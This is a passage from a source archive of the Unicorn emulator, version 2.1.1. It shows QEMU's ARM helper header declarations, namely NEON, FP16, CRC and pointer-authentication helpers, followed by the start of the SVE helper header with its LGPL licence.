DEF_HELPER_FLAGS_3(rsqrtsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) DEF_HELPER_FLAGS_3(rsqrtsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) DEF_HELPER_FLAGS_1(neon_addlp_s8, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(neon_addlp_u8, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(neon_addlp_s16, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(neon_addlp_u16, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_2(frecpx_f64, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(frecpx_f32, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(frecpx_f16, TCG_CALL_NO_RWG, f16, f16, ptr) DEF_HELPER_FLAGS_2(fcvtx_f64_to_f32, TCG_CALL_NO_RWG, f32, f64, env) DEF_HELPER_FLAGS_3(crc32_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) DEF_HELPER_FLAGS_3(crc32c_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) DEF_HELPER_FLAGS_4(paired_cmpxchg64_le, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(paired_cmpxchg64_le_parallel, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(paired_cmpxchg64_be, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(paired_cmpxchg64_be_parallel, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_5(casp_le_parallel, void, env, i32, i64, i64, i64) DEF_HELPER_5(casp_be_parallel, void, env, i32, i64, i64, i64) DEF_HELPER_FLAGS_3(advsimd_maxh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(advsimd_minh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(advsimd_maxnumh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(advsimd_minnumh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_addh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_subh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_mulh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_divh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_ceq_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_cge_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_cgt_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_acge_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_acgt_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_mulxh, f16, f16, f16, ptr) DEF_HELPER_4(advsimd_muladdh, f16, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_add2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_sub2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_mul2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_div2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_max2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_min2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_maxnum2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_minnum2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_mulx2h, i32, i32, i32, ptr) DEF_HELPER_4(advsimd_muladd2h, i32, i32, i32, i32, ptr) DEF_HELPER_2(advsimd_rinth_exact, f16, f16, ptr) DEF_HELPER_2(advsimd_rinth, f16, f16, ptr) DEF_HELPER_2(advsimd_f16tosinth, i32, f16, ptr) DEF_HELPER_2(advsimd_f16touinth, i32, f16, ptr) DEF_HELPER_2(sqrt_f16, f16, f16, ptr) DEF_HELPER_2(exception_return, void, env, i64) DEF_HELPER_FLAGS_2(dc_zva, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_3(pacia, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacib, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacda, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacga, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autia, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autib, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autda, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_2(xpaci, TCG_CALL_NO_RWG_SE, i64, env, i64) DEF_HELPER_FLAGS_2(xpacd, TCG_CALL_NO_RWG_SE, i64, env, i64) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/helper-sve.h����������������������������������������������������������0000664�0000000�0000000�00000235432�14675241067�0020454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AArch64 SVE specific helper definitions * * Copyright (c) 2018 Linaro, Ltd * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ DEF_HELPER_FLAGS_2(sve_predtest1, TCG_CALL_NO_WG, i32, i64, i64) DEF_HELPER_FLAGS_3(sve_predtest, TCG_CALL_NO_WG, i32, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_pfirst, TCG_CALL_NO_WG, i32, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_pnext, TCG_CALL_NO_WG, i32, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sdiv_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sdiv_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_udiv_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_udiv_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_saddv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_saddv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_saddv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_b, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fabs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fabs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fabs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fneg_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fneg_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fneg_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtb_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtb_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtb_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtb_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtb_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtb_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxth_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxth_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxth_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxth_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtw_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtw_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) 